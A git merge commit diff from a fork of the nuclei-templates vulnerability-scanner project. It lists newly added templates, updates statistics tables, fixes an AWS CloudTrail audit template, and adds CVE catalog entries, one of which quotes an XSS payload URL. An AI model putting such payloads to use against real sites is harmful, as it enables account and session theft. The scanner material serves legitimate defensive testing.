Merge branch 'projectdiscovery:main' into main

patch-4
Satya Prakash 2024-05-16 16:09:07 +05:30 committed by GitHub
commit f20da22ead
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
81 changed files with 7471 additions and 5691 deletions


@ -3,70 +3,46 @@ on:
push:
paths:
- '.new-additions'
- 'http/cves/2015/CVE-2015-4455.yaml'
- 'http/cves/2019/CVE-2019-7139.yaml'
- 'http/cves/2023/CVE-2023-1892.yaml'
- 'http/cves/2023/CVE-2023-2227.yaml'
- 'http/cves/2023/CVE-2023-27032.yaml'
- 'http/cves/2023/CVE-2023-2948.yaml'
- 'http/cves/2023/CVE-2023-2949.yaml'
- 'http/cves/2023/CVE-2023-31446.yaml'
- 'http/cves/2023/CVE-2023-32077.yaml'
- 'http/cves/2023/CVE-2023-38964.yaml'
- 'http/cves/2023/CVE-2023-43208.yaml'
- 'http/cves/2023/CVE-2023-44812.yaml'
- 'http/cves/2023/CVE-2023-4521.yaml'
- 'http/cves/2023/CVE-2023-45375.yaml'
- 'http/cves/2023/CVE-2023-46347.yaml'
- 'http/cves/2023/CVE-2023-4973.yaml'
- 'http/cves/2023/CVE-2023-5003.yaml'
- 'http/cves/2023/CVE-2023-6389.yaml'
- 'http/cves/2023/CVE-2023-6989.yaml'
- 'http/cves/2024/CVE-2024-0235.yaml'
- 'http/cves/2024/CVE-2024-0881.yaml'
- 'http/cves/2024/CVE-2024-1183.yaml'
- 'http/cves/2024/CVE-2024-22927.yaml'
- 'http/cves/2024/CVE-2024-2340.yaml'
- 'http/cves/2024/CVE-2024-23917.yaml'
- 'http/cves/2024/CVE-2024-24131.yaml'
- 'http/cves/2024/CVE-2024-27956.yaml'
- 'http/cves/2024/CVE-2024-2876.yaml'
- 'http/cves/2024/CVE-2024-3136.yaml'
- 'http/cves/2024/CVE-2024-31621.yaml'
- 'http/cves/2024/CVE-2024-31848.yaml'
- 'http/cves/2024/CVE-2024-31849.yaml'
- 'http/cves/2024/CVE-2024-31850.yaml'
- 'http/cves/2024/CVE-2024-31851.yaml'
- 'http/cves/2024/CVE-2024-32399.yaml'
- 'http/cves/2024/CVE-2024-32640.yaml'
- 'http/cves/2024/CVE-2024-32651.yaml'
- 'http/cves/2024/CVE-2024-33575.yaml'
- 'http/cves/2024/CVE-2024-33724.yaml'
- 'http/cves/2024/CVE-2024-4040.yaml'
- 'http/cves/2024/CVE-2024-4348.yaml'
- 'http/default-logins/crushftp/crushftp-anonymous-login.yaml'
- 'http/default-logins/crushftp/crushftp-default-login.yaml'
- 'http/default-logins/soplanning/soplanning-default-login.yaml'
- 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml'
- 'http/exposed-panels/bonobo-server-panel.yaml'
- 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml'
- 'http/exposed-panels/cyberchef-panel.yaml'
- 'http/exposed-panels/femtocell-panel.yaml'
- 'http/exposed-panels/monitorr-panel.yaml'
- 'http/exposed-panels/openwebui-panel.yaml'
- 'http/exposed-panels/teamforge-panel.yaml'
- 'http/exposed-panels/tixeo-panel.yaml'
- 'http/misconfiguration/installer/eyoucms-installer.yaml'
- 'http/misconfiguration/installer/sabnzbd-installer.yaml'
- 'http/misconfiguration/microsoft/ms-exchange-local-domain.yaml'
- 'http/misconfiguration/titannit-web-exposure.yaml'
- 'http/takeovers/squadcast-takeover.yaml'
- 'http/vulnerabilities/citrix/citrix-oob-memory-read.yaml'
- 'http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml'
- 'http/vulnerabilities/titan/titannit-web-rce.yaml'
- 'http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml'
- 'network/detection/aix-websm-detect.yaml'
- 'network/detection/bluecoat-telnet-proxy-detect.yaml'
- 'http/cnvd/2017/CNVD-2017-06001.yaml'
- 'http/cves/2023/CVE-2023-29827.yaml'
- 'http/cves/2023/CVE-2023-35158.yaml'
- 'http/cves/2023/CVE-2023-36347.yaml'
- 'http/cves/2023/CVE-2023-43374.yaml'
- 'http/cves/2023/CVE-2023-44813.yaml'
- 'http/cves/2023/CVE-2023-45855.yaml'
- 'http/cves/2023/CVE-2023-5991.yaml'
- 'http/cves/2024/CVE-2024-0200.yaml'
- 'http/cves/2024/CVE-2024-1561.yaml'
- 'http/cves/2024/CVE-2024-3097.yaml'
- 'http/default-logins/softether/softether-vpn-default-login.yaml'
- 'http/exposed-panels/ackee-panel.yaml'
- 'http/exposed-panels/craftercms-panel.yaml'
- 'http/exposed-panels/easyvista-panel.yaml'
- 'http/exposed-panels/fortinet/f5-next-central-manager.yaml'
- 'http/exposed-panels/ghost-panel.yaml'
- 'http/exposed-panels/matomo-panel.yaml'
- 'http/exposed-panels/n8n-panel.yaml'
- 'http/exposed-panels/nocodb-panel.yaml'
- 'http/exposed-panels/pocketbase-panel.yaml'
- 'http/exposed-panels/qlikview-accesspoint-panel.yaml'
- 'http/exposed-panels/tiny-rss-panel.yaml'
- 'http/exposed-panels/unleash-panel.yaml'
- 'http/honeypot/tpot-honeypot-detect.yaml'
- 'http/misconfiguration/installer/custom-xoops-installer.yaml'
- 'http/misconfiguration/installer/froxlor-installer.yaml'
- 'http/misconfiguration/installer/moosocial-installer.yaml'
- 'http/misconfiguration/installer/phpmyfaq-installer.yaml'
- 'http/misconfiguration/unigui-server-monitor-exposure.yaml'
- 'http/technologies/apache/apache-answer-detect.yaml'
- 'http/technologies/boa-web-server.yaml'
- 'http/technologies/craftercms-detect.yaml'
- 'http/technologies/imgproxy-detect.yaml'
- 'http/technologies/statamic-detect.yaml'
- 'http/technologies/tinyproxy-detect.yaml'
- 'http/technologies/uni-gui-framework.yaml'
- 'http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml'
- 'http/vulnerabilities/other/castel-digital-sqli.yaml'
- 'javascript/enumeration/checkpoint-firewall-enum.yaml'
workflow_dispatch:
jobs:
triggerRemoteWorkflow:


@ -1,64 +1,40 @@
http/cves/2015/CVE-2015-4455.yaml
http/cves/2019/CVE-2019-7139.yaml
http/cves/2023/CVE-2023-1892.yaml
http/cves/2023/CVE-2023-2227.yaml
http/cves/2023/CVE-2023-27032.yaml
http/cves/2023/CVE-2023-2948.yaml
http/cves/2023/CVE-2023-2949.yaml
http/cves/2023/CVE-2023-31446.yaml
http/cves/2023/CVE-2023-32077.yaml
http/cves/2023/CVE-2023-38964.yaml
http/cves/2023/CVE-2023-43208.yaml
http/cves/2023/CVE-2023-44812.yaml
http/cves/2023/CVE-2023-4521.yaml
http/cves/2023/CVE-2023-45375.yaml
http/cves/2023/CVE-2023-46347.yaml
http/cves/2023/CVE-2023-4973.yaml
http/cves/2023/CVE-2023-5003.yaml
http/cves/2023/CVE-2023-6389.yaml
http/cves/2023/CVE-2023-6989.yaml
http/cves/2024/CVE-2024-0235.yaml
http/cves/2024/CVE-2024-0881.yaml
http/cves/2024/CVE-2024-1183.yaml
http/cves/2024/CVE-2024-22927.yaml
http/cves/2024/CVE-2024-2340.yaml
http/cves/2024/CVE-2024-23917.yaml
http/cves/2024/CVE-2024-24131.yaml
http/cves/2024/CVE-2024-27956.yaml
http/cves/2024/CVE-2024-2876.yaml
http/cves/2024/CVE-2024-3136.yaml
http/cves/2024/CVE-2024-31621.yaml
http/cves/2024/CVE-2024-31848.yaml
http/cves/2024/CVE-2024-31849.yaml
http/cves/2024/CVE-2024-31850.yaml
http/cves/2024/CVE-2024-31851.yaml
http/cves/2024/CVE-2024-32399.yaml
http/cves/2024/CVE-2024-32640.yaml
http/cves/2024/CVE-2024-32651.yaml
http/cves/2024/CVE-2024-33575.yaml
http/cves/2024/CVE-2024-33724.yaml
http/cves/2024/CVE-2024-4040.yaml
http/cves/2024/CVE-2024-4348.yaml
http/default-logins/crushftp/crushftp-anonymous-login.yaml
http/default-logins/crushftp/crushftp-default-login.yaml
http/default-logins/soplanning/soplanning-default-login.yaml
http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml
http/exposed-panels/bonobo-server-panel.yaml
http/exposed-panels/cassia-bluetooth-gateway-panel.yaml
http/exposed-panels/cyberchef-panel.yaml
http/exposed-panels/femtocell-panel.yaml
http/exposed-panels/monitorr-panel.yaml
http/exposed-panels/openwebui-panel.yaml
http/exposed-panels/teamforge-panel.yaml
http/exposed-panels/tixeo-panel.yaml
http/misconfiguration/installer/eyoucms-installer.yaml
http/misconfiguration/installer/sabnzbd-installer.yaml
http/misconfiguration/microsoft/ms-exchange-local-domain.yaml
http/misconfiguration/titannit-web-exposure.yaml
http/takeovers/squadcast-takeover.yaml
http/vulnerabilities/citrix/citrix-oob-memory-read.yaml
http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml
http/vulnerabilities/titan/titannit-web-rce.yaml
http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml
network/detection/aix-websm-detect.yaml
network/detection/bluecoat-telnet-proxy-detect.yaml
http/cnvd/2017/CNVD-2017-06001.yaml
http/cves/2023/CVE-2023-29827.yaml
http/cves/2023/CVE-2023-35158.yaml
http/cves/2023/CVE-2023-36347.yaml
http/cves/2023/CVE-2023-43374.yaml
http/cves/2023/CVE-2023-44813.yaml
http/cves/2023/CVE-2023-45855.yaml
http/cves/2023/CVE-2023-5991.yaml
http/cves/2024/CVE-2024-0200.yaml
http/cves/2024/CVE-2024-1561.yaml
http/cves/2024/CVE-2024-3097.yaml
http/default-logins/softether/softether-vpn-default-login.yaml
http/exposed-panels/ackee-panel.yaml
http/exposed-panels/craftercms-panel.yaml
http/exposed-panels/easyvista-panel.yaml
http/exposed-panels/fortinet/f5-next-central-manager.yaml
http/exposed-panels/ghost-panel.yaml
http/exposed-panels/matomo-panel.yaml
http/exposed-panels/n8n-panel.yaml
http/exposed-panels/nocodb-panel.yaml
http/exposed-panels/pocketbase-panel.yaml
http/exposed-panels/qlikview-accesspoint-panel.yaml
http/exposed-panels/tiny-rss-panel.yaml
http/exposed-panels/unleash-panel.yaml
http/honeypot/tpot-honeypot-detect.yaml
http/misconfiguration/installer/custom-xoops-installer.yaml
http/misconfiguration/installer/froxlor-installer.yaml
http/misconfiguration/installer/moosocial-installer.yaml
http/misconfiguration/installer/phpmyfaq-installer.yaml
http/misconfiguration/unigui-server-monitor-exposure.yaml
http/technologies/apache/apache-answer-detect.yaml
http/technologies/boa-web-server.yaml
http/technologies/craftercms-detect.yaml
http/technologies/imgproxy-detect.yaml
http/technologies/statamic-detect.yaml
http/technologies/tinyproxy-detect.yaml
http/technologies/uni-gui-framework.yaml
http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml
http/vulnerabilities/other/castel-digital-sqli.yaml
javascript/enumeration/checkpoint-firewall-enum.yaml


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2435 | dhiyaneshdk | 1262 | http | 7355 | info | 3645 | file | 337 |
| panel | 1123 | daffainfo | 864 | file | 337 | high | 1686 | dns | 25 |
| wordpress | 962 | dwisiswant0 | 803 | workflows | 191 | medium | 1503 | | |
| exposure | 901 | pikpikcu | 353 | network | 136 | critical | 1009 | | |
| xss | 895 | pussycat0x | 349 | cloud | 98 | low | 265 | | |
| wp-plugin | 837 | ritikchaddha | 326 | code | 81 | unknown | 38 | | |
| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 |
| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 |
| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | |
| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | |
| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | |
| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | |
| osint | 804 | pdteam | 297 | javascript | 56 | | | | |
| tech | 674 | princechaddha | 260 | ssl | 29 | | | | |
| lfi | 647 | ricardomaia | 232 | dns | 22 | | | | |
| misconfig | 602 | geeknik | 230 | dast | 21 | | | | |
| tech | 674 | princechaddha | 268 | ssl | 29 | | | | |
| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | |
| misconfig | 606 | geeknik | 230 | dast | 21 | | | | |
**633 directories, 8625 files**.
**638 directories, 8694 files**.
</td>
</tr>



@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2435 | dhiyaneshdk | 1262 | http | 7355 | info | 3645 | file | 337 |
| panel | 1123 | daffainfo | 864 | file | 337 | high | 1686 | dns | 25 |
| wordpress | 962 | dwisiswant0 | 803 | workflows | 191 | medium | 1503 | | |
| exposure | 901 | pikpikcu | 353 | network | 136 | critical | 1009 | | |
| xss | 895 | pussycat0x | 349 | cloud | 98 | low | 265 | | |
| wp-plugin | 837 | ritikchaddha | 326 | code | 81 | unknown | 38 | | |
| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 |
| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 |
| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | |
| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | |
| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | |
| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | |
| osint | 804 | pdteam | 297 | javascript | 56 | | | | |
| tech | 674 | princechaddha | 260 | ssl | 29 | | | | |
| lfi | 647 | ricardomaia | 232 | dns | 22 | | | | |
| misconfig | 602 | geeknik | 230 | dast | 21 | | | | |
| tech | 674 | princechaddha | 268 | ssl | 29 | | | | |
| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | |
| misconfig | 606 | geeknik | 230 | dast | 21 | | | | |


@ -14,12 +14,13 @@ info:
tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config
variables:
region: "ap-south-1"
region: "us-east-1"
flow: |
code(1)
for(let CloudTrail of iterate(template.cloudtrailname)){
set("trail", CloudTrail)
set("region", template.trailregion)
code(2)
}
@ -29,14 +30,20 @@ code:
- sh
- bash
source: |
aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json
aws cloudtrail list-trails --region $region --query 'Trails[*].[Name, HomeRegion]' --output json
extractors:
- type: json
name: cloudtrailname
internal: true
json:
- '.[]'
- '.[] | .[0]'
- type: json
name: trailregion
internal: true
json:
- '.[] | .[1]'
- engine:
- sh
@ -52,5 +59,5 @@ code:
extractors:
- type: dsl
dsl:
- '"CloudTrail trail" + trail + " is not configured to encrypt log files using SSE-KMS encryption"'
# digest: 490a004630440220615ff60f92dc1540ae499c543e657c18d430e7b6b08291befb395d465b0dfa280220748efe3b2771beb250f0c50040e94c8c0a9a37f60fcb6c88bbe9ff55b5362fa1:922c64590222798bb761d5b6d8e72950
- '"CloudTrail trail " + trail + " is not configured to encrypt log files using SSE-KMS encryption"'
# digest: 4b0a00483046022100b39586900f3cb7a7ce2582be709c7b3d1b25bceaf0f6d35887c3a3d62bfff8d80221009aa3a72ddade09b522655349a54b6cb7e6e0ebd3b36d85b30899b283e77dc90d:922c64590222798bb761d5b6d8e72950
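Review bot: In the `flow` block the added `set("region", template.trailregion)` hands the second code step the whole extracted `trailregion` value rather than the home region of the trail currently being iterated, so in an account with trails in more than one region `$region` would presumably be a list or the wrong region. The likely result is that the per-trail check fails or queries the wrong region and an unencrypted trail goes unreported, which is a silent false negative for this audit. Pairing the two extractor outputs by position would avoid that, for example by keeping a counter `i` in the loop and using `set("region", iterate(template.trailregion)[i])`, or by emitting name and region as one value from a single extractor and splitting it inside the loop. This assumes the flow engine exposes multi-value extractors as arrays, which should be confirmed. The second `code` step that consumes `$region` lies outside the visible hunks, so how it uses the value is inferred.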

View File

@ -1973,7 +1973,6 @@
{"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Improper Access Control","Severity":"high","Description":"Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-48165.yaml"}
{"ID":"CVE-2022-48197","Info":{"Name":"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting","Severity":"medium","Description":"Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-48197.yaml"}
{"ID":"CVE-2022-4897","Info":{"Name":"WordPress BackupBuddy \u003c8.8.3 - Cross Site Scripting","Severity":"medium","Description":"WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4897.yaml"}
{"ID":"CVE-2023-6389","Info":{"Name":"WordPress Toolbar \u003c= 2.2.6 - Open Redirect","Severity":"medium","Description":"The plugin redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/ CVE-2023-6389.yaml"}
{"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"}
{"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"}
{"ID":"CVE-2023-0159","Info":{"Name":"Extensive VC Addons for WPBakery page builder \u003c 1.9.1 - Unauthenticated RCE","Severity":"high","Description":"The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0159.yaml"}
@ -2116,6 +2115,7 @@
{"ID":"CVE-2023-29622","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29622.yaml"}
{"ID":"CVE-2023-29623","Info":{"Name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29623.yaml"}
{"ID":"CVE-2023-2982","Info":{"Name":"Miniorange Social Login and Register \u003c= 7.6.3 - Authentication Bypass","Severity":"critical","Description":"The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2982.yaml"}
{"ID":"CVE-2023-29827","Info":{"Name":"Embedded JavaScript(EJS) 3.1.6 - Template Injection","Severity":"critical","Description":"ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29827.yaml"}
{"ID":"CVE-2023-29887","Info":{"Name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","Severity":"high","Description":"A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29887.yaml"}
{"ID":"CVE-2023-29919","Info":{"Name":"SolarView Compact \u003c= 6.00 - Local File Inclusion","Severity":"critical","Description":"There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-29919.yaml"}
{"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"}
@ -2175,6 +2175,7 @@
{"ID":"CVE-2023-34993","Info":{"Name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","Severity":"critical","Description":"A improper neutralization of special elements used in an os command ('os\ncommand injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and\n8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands\nSuccessful exploitation of this vulnerability could allow an attacker to\nbypass authentication and gain unauthorized access to the affected system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34993.yaml"}
{"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"}
{"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web applications security filter chain.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"}
{"ID":"CVE-2023-35158","Info":{"Name":"XWiki - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: \u003e /xwiki/bin/view/XWiki/Main?xpage=restore\u0026showBatch=true\u0026xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35158.yaml"}
{"ID":"CVE-2023-35813","Info":{"Name":"Sitecore - Remote Code Execution","Severity":"critical","Description":"Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35813.yaml"}
{"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"}
{"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"}
@ -2184,6 +2185,7 @@
{"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"}
{"ID":"CVE-2023-36306","Info":{"Name":"Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting","Severity":"medium","Description":"A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36306.yaml"}
{"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross Site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"}
{"ID":"CVE-2023-36347","Info":{"Name":"POS Codekop v2.0 - Broken Authentication","Severity":"high","Description":"A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-36347.yaml"}
{"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"medium","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"}
{"ID":"CVE-2023-36845","Info":{"Name":"Juniper J-Web - Remote Code Execution","Severity":"critical","Description":"A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-36845.yaml"}
{"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"}
@ -2262,18 +2264,22 @@
{"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"}
{"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"}
{"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"}
{"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"}
